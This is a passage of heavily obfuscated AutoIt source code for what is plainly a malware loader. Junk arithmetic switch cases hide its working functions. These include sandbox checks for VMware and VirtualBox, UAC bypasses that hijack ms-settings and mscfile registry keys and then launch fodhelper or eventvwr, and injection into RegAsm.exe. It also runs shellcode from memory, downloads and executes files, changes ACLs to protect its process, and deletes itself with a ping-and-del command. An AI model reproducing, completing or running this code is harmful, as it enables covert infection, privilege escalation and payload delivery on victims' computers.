= 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) CASE (1678 - + 4294959755 - + 4294959354 - + 4294958476 = 9226 3104 + + 4294966859 - + 4294963763 + 3026 = 14099 7312 - + 4294962333 - + 4294967023 + 1551 = 25981 ) DLLSTRUCTSETDATA ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD , "1" , "CURRENT_USER" ) ENDSWITCH $MAINSTRUCPOINTER 
= DLLSTRUCTGETPTR ($DWGBIQJWBPZWDCCJYPWOQXYMZRMTRPZJZAVFMC ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) SWITCH 1 CASE (+ 4294960686 - + 4294965147 - + 4294960326 + + 4294965814 - + 4294964926 = + 4294963187 + 4294966402 - + 4294963211 + 4294959996 = 4855 5733 + + 4294966150 + + 4294958807 - + 4294958539 = 3397 ) DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) CASE (17 - + 4294964762 + + 4294960726 - + 4294965976 + 842 = 1892 + 4294962203 + + 4294965542 - + 4294958557 = + 4294959491 3765 - + 4294966370 + + 4294959258 + 4294962838 = + 4294965439 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) CASE (3155 + 6488 + 972 = 3304 1738 + 1566 = + 4294962061 5541 + + 4294960704 + 4294962211 + 4294959799 - + 4294958898 = 10615 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER 
) CASE (335 + 1246 - + 4294961205 - + 4294962828 = 12140 + 4294960680 + 4294960254 + 4294966137 + + 4294958955 - + 4294961230 = + 4294950204 + 4294959903 + + 4294962329 + + 4294964262 - + 4294966403 - + 4294960899 = + 4294959192 ) $SETENTRIESINACL = DLLCALL ("Advapi32.dll" , "dword" , "SetEntriesInAclA" , "ulong" , "1" , "ptr" , $MAINSTRUCPOINTER , "ptr" , "0" , "ptr" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) ENDSWITCH SWITCH 1 CASE (2031 - + 4294964329 + + 4294962755 + 4294962640 + + 4294963247 = 18863 8101 - + 4294959414 + 5062 + 4294965114 = 4007 2504 + 4294964402 - + 4294962899 = + 4294959048 ) LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) CASE (2633 - + 4294961037 + + 4294961298 - + 4294961072 + 80 = + 4294967216 + 4294959574 + 3057 + 5825 + + 4294966056 = + 4294962988 883 + + 4294962105 = 9198 ) FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (+ 4294965799 + 4294964543 + + 4294961958 - + 4294965662 = + 4294954227 + 4294960640 + 4294958755 + 4294963223 - + 4294959470 + 4294965671 = 11384 8100 - + 4294964012 = + 4294959342 ) FILEWRITE ($URLOPEN , $URLCONTENT ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (1366 + 2941 + 1597 = 5904 + 4294962940 - + 4294963074 = + 4294967162 
3104 - + 4294963260 + 6622 + 51 + + 4294958449 = 4966 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) ENDSWITCH DLLCALL ("Kernel32.dll" , "Handle" , "LocalFree" , "Handle" , $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER ) ENDFUNC FUNC PJUVRYUZPYTUIMLJMDVPPVKMAA ($LOOP , $TIME ) SWITCH 0 CASE (+ 4294963794 + + 4294960569 = + 4294957067 + 4294967144 + 4294963542 + 6278 + 1029 - + 4294959011 = 11686 + 4294967057 + + 4294962558 = + 4294962319 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294960549 - + 4294958915 = 1634 + 4294966279 - + 4294966021 - + 4294960820 + 8710 = 15444 517 + 2964 - + 4294959515 + + 4294959769 = 3735 ) $URLOPEN = FILEOPEN ($OBBNXDUCPNVNYLY , "2" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (+ 4294966519 - + 4294966356 = 163 832 + 7343 = 8175 + 4294960357 + 4294960102 - + 4294961070 + 4161 + 4294958933 = + 4294955187 ) $SETSECURITYINFO = DLLCALL ("Advapi32.dll" , "dword" , "SetSecurityInfo" , "handle" , $HANDLE , "int" , "6" , "dword" , "0x00000004" , "dword" , "0" , "dword" , "0" , "ptr" , DLLSTRUCTGETDATA ($QHNKYCOISAZTOELZARDAOCMMASRG , EXECUTE ("1" ) ) , "ptr" , "0" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (+ 4294960934 + 6762 = + 4294957204 + 4294965633 + + 4294958867 = 5664 2276 - + 4294962307 + 4294965695 = 400 ) LOCAL $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) ENDSWITCH FOR $I = "0" TO $LOOP SWITCH 1 CASE (+ 4294959125 - + 4294965537 + 7412 + 4294966801 = + 4294957301 + 4294967239 + + 4294960201 + + 4294962202 - + 4294965045 = 17729 
+ 4294962032 - + 4294960996 + 1367 - + 4294959867 - + 4294959399 = 505 ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) CASE (4192 + + 4294958749 + + 4294962122 + + 4294962066 = + 4294952840 + 4294964453 + 4294961824 + 4294966311 + 4294962140 = 8675 6592 + 2079 - + 4294964994 + + 4294964998 = + 4294952537 ) LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["0x401FFFFF" , "3" , "0" , "0" , "0" , "1" , "0" , DLLSTRUCTGETPTR ($XFKXPROGILAHMYBXGXUCQEQFMPQWDHWXVZYIFZJVKKD ) ] CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) CASE (2667 + 4294962105 + 8187 + 4294963866 + 4294965933 = + 4294957494 + 4294960773 + 4294960928 - + 4294964207 = 2232 5120 + 4294965629 - + 4294963345 + + 4294962124 = 870 ) LOCAL $UYIEGCJMPAKFZYWTXDINSLYTAOSBORYHPPWQNBIOSQZGFRYMJDRYXEE = DLLSTRUCTCREATE ("byte shellcode[" & $OUBJOAAIMSDPJLUJMOJFFINL & "]" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS ) CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) CASE (+ 4294961701 + + 4294963257 - + 4294961360 + 4294965883 = + 4294962185 + 4294964719 + + 4294962505 + 1750 + 4294966525 = + 4294960907 8588 + 4294965238 - + 4294959535 = 14291 ) SLEEP ($TIME / $LOOP ) ENDSWITCH $OGXVTCHZXQNVYQRDEYYWPBIB += RANDOM ("0" , "255" ) IF $OGXVTCHZXQNVYQRDEYYWPBIB = $OGXVTCHZXQNVYQRDEYYWPBIB THEN SWITCH 1 CASE (8714 + 4294961559 - + 4294958644 + + 4294962709 - + 4294963517 = + 4294956748 + 4294961295 - + 4294964023 + + 4294962042 + 4294964136 + 594 = 3525 4536 - + 4294964796 + + 4294961795 + 1990 = 10821 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ ) CASE (5094 + 7841 = + 4294954196 + 4294958683 + 4294964320 + 5796 + 4294959989 = 4656 + 4294959596 - + 4294960254 - + 4294961982 = 12935 ) LOCAL 
$REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN = FILEOPEN (@AUTOITEXE , "16" ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (3867 + 7651 + 4294966602 = + 4294952924 1120 + + 4294963553 + 4294962735 + 4294960108 = 12737 4679 + + 4294962820 + 8283 - + 4294963045 = 10824 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) CASE (3201 + 4294966230 + 4294965394 - + 4294963211 + + 4294959746 = + 4294964064 + 4294962646 + 4294962901 = + 4294958251 2349 + + 4294965985 = 1038 ) $OGXVTCHZXQNVYQRDEYYWPBIB = RANDOM ("0" , "255" ) ENDSWITCH ENDIF NEXT ENDFUNC FUNC ZAAOVMXICJWJRRBGUADERMITN ($SOCCURRENCENAME ) SWITCH 1 CASE (+ 4294961000 - + 4294959043 - + 4294962850 - + 4294963711 = 5876 7085 + 4294965988 + 99 = 3904 + 4294966930 + 556 + 3714 = 9988 ) $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] CASE (2633 - + 4294958695 - + 4294962736 + + 4294961463 = + 4294965238 + 4294959652 + 3540 + + 4294961943 + 3240 - + 4294963137 = + 4294949244 + 4294964372 + + 4294959103 + + 4294958655 - + 4294965590 = 9961 ) FILECLOSE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (1271 - + 4294965581 + + 4294961302 + + 4294961899 + 4294960382 = + 4294957118 + 4294959010 + 4294966934 + 5242 + + 4294962788 + 4294965032 = 11514 8037 - + 4294963819 = + 4294951977 ) LOCAL 
$OUBJOAAIMSDPJLUJMOJFFINARY = FILEREAD ($REKZAAHOPSPENYFKWYWOQOYXKCKZAEPNKJEPSUZOUMYFN ) & BINARY (RANDOM ("0" , "255" ) ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) CASE (3908 + 4294964236 = 848 + 4294958955 + 474 + 4294958661 + 4294959154 = + 4294942652 7285 + 4294960439 + 1484 + + 4294966141 + 7380 = 8137 ) LOCAL $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW = DLLCALL ("kernel32.dll" , "handle" , "CreateMutexW" , "struct*" , "0" , "bool" , "1" , "wstr" , $SOCCURRENCENAME ) ENDSWITCH LOCAL $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) IF $DOGKUTDXAMPYZJRYYTZNFZHEXRHZJMBVTBU ["0" ] = "183" THEN DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $SPKUMLGLOMHMYZFWTQENOHVRQPKUWPMYVABMXFKFGJKDJRFYTAW ["0" ] ) SWITCH 0 CASE (+ 4294958857 + + 4294959819 + 3768 + + 4294963553 = + 4294951405 + 4294967148 + + 4294963180 - + 4294963650 = + 4294966678 4462 + 7302 - + 4294960030 + + 4294958883 - + 4294959176 = 18737 ) SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) CASE (+ 4294959100 + + 4294961434 + 4294966761 = + 4294952703 843 + 4294959577 + + 4294964263 - + 4294964755 = + 4294959928 5004 - + 4294959562 + 4294965322 + + 4294958415 = 1883 ) $VBSOPEN = FILEOPEN ($DTISJMIDXWOJTBLFFZUKGGPNPUZNQYLQRCWBFFZMVROZJBWUDU , "2" ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) CASE (2448 - + 4294963425 = 6319 6627 - + 4294961107 + 4294960689 + 4294964401 = 3314 2072 + + 4294965048 + 4294961362 + 4294963558 - + 4294965356 = + 4294959388 ) LOCAL 
$KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) CASE (+ 4294958851 + 4294966427 + + 4294963556 + 4294959246 + 4294962752 = + 4294957215 + 4294965661 + 4294958850 = 4038 7657 + + 4294963677 = + 4294941648 ) PROCESSCLOSE (@AUTOITEXE ) ENDSWITCH ENDIF ENDFUNC FUNC VWFAJPUJWAKVLYBUBFHQFVGAWGQJR ($RESNAME , $RESTYPE ) LOCAL $RESPOINTER LOCAL $RESSIZE LOCAL $HINSTANCE LOCAL $INFOBLOCK LOCAL $GLOBALMEMORYBLOCK LOCAL $MEMORYPOINTER SWITCH 0 CASE (7749 + + 4294964107 = 4560 6454 + 4294966036 = 5194 + 4294959891 + 2563 + 2887 + 4294960107 = + 4294958152 ) SHELLEXECUTE ($MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (3766 - + 4294960984 + 4083 + 4294962474 + + 4294960577 = 2620 3792 + 4294962993 + + 4294966540 - + 4294963728 + 4294959654 = + 4294961955 7012 + 8184 - + 4294959225 - + 4294964641 = 25922 ) FILEWRITE ($AJDQJAIDPTEQIWGATMCERFEKYPSWJNWDDSVZHQ , $FILE ) CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (7024 - + 4294959522 + + 4294965630 = 13132 + 4294964549 + + 4294961294 - + 4294963676 = + 4294962167 + 4294958533 + 2124 + + 4294961104 = + 4294954465 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , 
$RESNAME , "long" , $RESTYPE ) ["0" ] CASE (3716 + + 4294961086 = + 4294962480 + 4294963397 + 4294962138 + 4241 = 1738 + 4294964962 + 4072 = + 4294964802 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , $RESNAME , "long" , $RESTYPE ) ["0" ] ENDSWITCH $RESSIZE = DLLCALL ("kernel32.dll" , "dword" , "SizeofResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] $GLOBALMEMORYBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "LoadResource" , "ptr" , $HINSTANCE , "ptr" , $INFOBLOCK ) ["0" ] $MEMORYPOINTER = DLLCALL ("kernel32.dll" , "ptr" , "LockResource" , "ptr" , $GLOBALMEMORYBLOCK ) ["0" ] SWITCH 1 CASE (6858 - + 4294965613 - + 4294962584 = 10896 5800 + 5096 = 1429 3900 - + 4294964026 + + 4294961555 = 13253 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294965134 + 4714 + 6769 + + 4294965906 = + 4294964878 + 4294960092 + 4786 = 8027 6627 - + 4294965896 = 7931 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294963235 + + 4294963993 + 5867 - + 4294965472 = 2829 3693 + 4294966011 + + 4294964612 + 3105 = 3230 + 4294962100 - + 4294958870 = 327 ) MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) CASE (+ 4294965913 + 4294961455 + 4715 + 4294959024 = + 4294956515 + 4294960439 + 4838 + + 4294959449 + + 4294966624 = + 4294956758 4228 + + 4294962107 + 4294962664 + + 4294966439 - + 4294960699 = 147 ) 
RETURN DLLSTRUCTCREATE ("byte[" & $RESSIZE & "]" , $MEMORYPOINTER ) ENDSWITCH ENDFUNC FUNC SNUDYENHFQLVAOTABJ () LOCAL $YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO UBOUND ($YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT ) - "1" IF PROCESSEXISTS ($YRGAIPECFYASOFVZEUBOJUTHDTNVAKFLIUTJTT [$I ] ) THEN PROCESSCLOSE (@AUTOITPID ) ENDIF NEXT ENDFUNC FUNC IOCFGSMTNGEOYEERBZKCZTIBDNP ($PROTECT ) LOCAL $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ = $IAHZOETNXYCDXIFHZTGAVGFJ IF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" ) THEN $PROCESSID = MKAWTJCTRCEZDEDBUQPZGMLXI (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" , "" , $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ , $PROTECT ) ELSEIF FILEEXISTS (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" ) THEN $PROCESSID = MKAWTJCTRCEZDEDBUQPZGMLXI (@HOMEDRIVE & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" , "" , $KUFYPJEHBVLRVMKLNHZCLBTKUPASCOSYAPJAGFKQ , $PROTECT ) ENDIF ENDFUNC FUNC OHUKFVGBOCBSWLZEQFYYJ () IF NOT WINEXISTS ("[CLASS:Progman]" ) THEN SWITCH 1 CASE (+ 4294962621 + 4294959550 - + 4294966279 + + 4294964980 + 8602 = + 4294952699 + 4294962557 + + 4294961608 + + 4294959415 + 819 - + 4294964404 = 6453 6212 + 3368 + + 4294964169 = + 4294962178 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) CASE (+ 4294961099 + 7233 + + 4294962617 = + 4294960837 + 4294962685 + + 4294966708 + 4294966036 = + 4294963647 4447 + 4294959200 = + 4294963653 ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294959246 - + 4294964074 + 4294959792 = + 4294952769 + 4294964266 + + 4294964148 + 4294962801 + 4294963442 = + 
4294961947 + 4294966082 + + 4294963161 = + 4294954964 ) DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) CASE (+ 4294960363 + 620 + 4294959292 - + 4294963378 = + 4294956897 6380 + 4294960042 - + 4294964761 - + 4294962698 = 6259 + 4294958606 + + 4294967172 = + 4294958482 ) PROCESSCLOSE (@AUTOITPID ) ENDSWITCH ENDIF ENDFUNC FUNC XVQROZGRABAHESGMV () ENDFUNC FUNC GQJRWUNJCRAZVSIWM () IF STRINGINSTR (@OSVERSION , "7" ) OR STRINGINSTR (@OSVERSION , "8" ) THEN IF NOT ISADMIN () THEN REGWRITE ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) SHELLEXECUTE ("eventvwr" ) PROCESSCLOSE (@AUTOITPID ) ENDIF ELSEIF STRINGINSTR (@OSVERSION , "10" ) THEN IF NOT ISADMIN () THEN DLLCALL ("kernel32.dll" , "boolean" , "Wow64EnableWow64FsRedirection" , "boolean" , "0" ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "DelegateExecute" , "REG_SZ" , "Null" ) REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , @AUTOITEXE ) SWITCH 1 CASE (+ 4294967088 + + 4294962333 - + 4294961732 = 12596 4091 - + 4294965420 + 7587 - + 4294966369 + 4294965411 = 325 + 4294966869 - + 4294966544 = 393 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (+ 4294965341 + + 4294959806 = + 4294953131 701 + + 4294965415 + + 4294960911 + 4294960696 = 469 + 4294965797 + 4294965017 + + 4294966253 + 5437 + + 4294967149 = + 4294957851 ) $QHNKYCOISAZTOELZARDAOCMMASRGPOINTER = DLLSTRUCTGETPTR ($QHNKYCOISAZTOELZARDAOCMMASRG ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) CASE (4995 + 7180 + 4294963058 = 3029 4387 + 2137 - + 4294966719 + 
4294963224 = 14700 7797 - + 4294960393 = 7937 ) LOCAL $KKNRYWQDLRBECCOKDXWDDJCWHBVBEONY = DLLCALLADDRESS ("dword" , $DRCSHRXWBXNMQMPDRZPVBFJXMEHKGANINRPVGORBCPGQWXLGWPCGS + "0xBE" , "wstr" , $WPATH , "wstr" , $WARGUMENTS , "ptr" , DLLSTRUCTGETPTR ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ ) ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) CASE (+ 4294964206 + + 4294959074 + 4294963557 + + 4294964898 = + 4294949847 + 4294962196 + + 4294960911 = + 4294955811 6435 - + 4294961717 + + 4294964354 = 9072 ) SHELLEXECUTE ("fodhelper" ) ENDSWITCH PROCESSCLOSE (@AUTOITPID ) ENDIF ENDIF ENDFUNC FUNC FLCFYXNWIBBCLIFPDBW ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN LOCAL $TYGYOJURBPDEKDJAUDZ = "0x00000010" MSGBOX ($TYPE , $TITLE , $OUBJOAAIMSDPJLUJMOJFFODY ) ENDIF ENDFUNC FUNC GDZJQFSBGZRFLWOBCCPPHJODO ($URL , $FILENAME , $DIR ) IF @SCRIPTDIR <> $QCTGPDCYIKISRF THEN LOCAL $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ = GETDIR ($DIR ) SWITCH 0 CASE (4176 + 2382 = 6558 + 4294966811 + 8314 + + 4294958582 = + 4294966411 + 4294961716 + 7349 = 1769 ) FILECLOSE ($FKBPTLNPOIJUFVBXZOGWIYSNWYGCZBFVNV [$I ] ) CASE (3980 - + 4294960890 - + 4294959385 + + 4294963295 = 14296 + 4294963173 + 4294966186 + 4294962215 + + 4294964076 = + 4294953762 1508 - + 4294961159 = 7645 ) DLLSTRUCTSETDATA ($ZOERKHYYBCPJCGFVVUVCMSNIQFSKZZ , "lpfile" , $LPFILE ) CASE (1046 - + 4294966352 + 2576 + + 4294963375 + 4294964959 = 12455 7089 + 4798 - + 4294964189 + 4294964757 = + 4294965496 + 4294959781 + 5715 = + 4294965604 ) INETGET ($URL , $MEMCMRFDKFHXIASCNLFGGABYOTQMAZ & "\" & $FILENAME ) CASE (3023 + 3295 + 4294967078 + + 4294961108 = + 4294967208 + 4294961452 - + 4294960110 - + 4294959740 = 8898 7739 + + 4294959763 - + 4294966849 + + 4294962601 = + 4294963254 ) $INFOBLOCK = DLLCALL ("kernel32.dll" , "ptr" , "FindResourceW" , "ptr" , $HINSTANCE , "wstr" , 
